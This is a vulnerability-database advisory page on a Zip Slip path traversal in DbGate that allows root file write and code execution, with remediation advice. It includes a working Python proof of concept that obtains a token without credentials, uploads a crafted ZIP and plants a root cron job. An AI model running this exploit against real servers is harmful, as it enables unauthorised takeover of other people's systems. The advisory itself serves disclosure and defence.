DbGate CVE-2026-47669
CRITICALLifecycle Timeline
2DescriptionCVE.org
The unzipDirectory() function in packages/api/src/shell/unzipDirectory.js (line 27) does not validate that extracted file paths stay within the output directory. A malicious ZIP with ../ entries writes files anywhere on the filesystem.
In the default Docker deployment, DbGate runs as root and the none auth provider issues JWT tokens without credentials via POST /auth/login, so this is exploitable by any network-adjacent attacker.
Affected code:
packages/api/src/shell/unzipDirectory.js, line 27:
const destPath = path.join(outputDirectory, entry.fileName);
// No check that destPath stays within outputDirectoryCalled from packages/api/src/controllers/archive.js, lines 291-293:
async unzip({ folder }) {
const newFolder = await this.getNewArchiveFolder({ database: folder.slice(0, -4) });
await unzipDirectory(path.join(archivedir(), folder), path.join(archivedir(), newFolder));The archive controller also has zero permission checks and zero path traversal protection on any of its endpoints.
PoC:
import requests, zipfile, io
TARGET = "http://localhost:3000"
# Get auth token (no credentials needed in default Docker)
r = requests.post(f"{TARGET}/api/auth/login", json={"amoid": "none"})
token = r.json()["accessToken"]
hdrs = {"Authorization": f"Bearer {token}"}
# Create malicious ZIP with path traversal
buf = io.BytesIO()
with zipfile.ZipFile(buf, 'w') as zf:
zf.writestr("../../../../../../etc/cron.d/dbgate-pwn",
"* * * * * root id > /tmp/pwned\n")
buf.seek(0)
# Upload ZIP
r = requests.post(f"{TARGET}/api/uploads/upload", headers=hdrs,
files={"data": ("evil.zip", buf, "application/zip")})
info = r.json()
# Save to archive
requests.post(f"{TARGET}/api/archive/save-uploaded-zip", headers=hdrs,
json={"filePath": info["filePath"], "fileName": "evil.zip"})
# Trigger Zip Slip - writes cron job to /etc/cron.d/
requests.post(f"{TARGET}/api/archive/unzip", headers=hdrs,
json={"folder": "evil.zip"})
print("Check /tmp/pwned after 1 minute")Impact: Arbitrary file write as root -> RCE. Full container compromise in Docker deployments.
AnalysisAI
Remote code execution in DbGate versions 7.1.8 and earlier allows network-adjacent attackers to achieve full container compromise via a Zip Slip flaw in the archive unzip endpoint. Because the default Docker deployment runs as root and the bundled 'none' authentication provider issues JWT tokens without credentials, any attacker reachable on the network can upload a malicious ZIP that writes files anywhere on the filesystem, including cron entries for code execution. Publicly available exploit code exists in the GHSA advisory itself, and an upstream patched release (7.1.9) is available.
Technical ContextAI
DbGate is an open-source database management web application distributed as the npm package 'dbgate' (pkg:npm/dbgate) and commonly deployed as a Docker container. The root cause is a CWE-22 path traversal in packages/api/src/shell/unzipDirectory.js at line 27, where destPath is computed as path.join(outputDirectory, entry.fileName) without verifying that the resolved path remains within outputDirectory. This is the canonical 'Zip Slip' pattern: archive entries containing '../' sequences resolve outside the intended extraction directory. The vulnerable function is invoked from the archive controller's unzip handler (packages/api/src/controllers/archive.js, lines 291-293), which exposes the behavior over HTTP and, per the advisory, lacks both permission checks and path traversal protection across its endpoints. The exposure is amplified by two deployment characteristics: the default Docker image runs the Node.js process as root, and the 'none' auth provider mints valid JWTs from POST /auth/login without any credentials.
RemediationAI
Vendor-released patch: upgrade dbgate to version 7.1.9 or later, available at https://github.com/dbgate/dbgate/releases/tag/v7.1.9, per the GHSA advisory at https://github.com/dbgate/dbgate/security/advisories/GHSA-h535-j5hr-mv56; for Docker users this means pulling the 7.1.9 (or newer) image tag and redeploying. If immediate upgrade is not possible, disable the 'none' authentication provider and require a real auth backend so that anonymous POST /auth/login no longer mints valid JWTs (trade-off: existing automation that relied on credential-less access will break and must be reconfigured). Additionally restrict network exposure of the DbGate API to trusted administrative networks via firewall, reverse-proxy ACLs, or a VPN, since the archive/unzip and uploads endpoints are the attack surface (trade-off: remote users must connect through the chosen access path). Where feasible, run the container as a non-root user and mount the filesystem read-only outside the archive directory to blunt the arbitrary-file-write primitive (trade-off: may require image rebuild and breaks any feature that writes outside the archive dir).
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac
Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build
Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c
Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2
An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve
Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at
Same weakness CWE-22 – Path Traversal
View allSame technique Path Traversal
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-h535-j5hr-mv56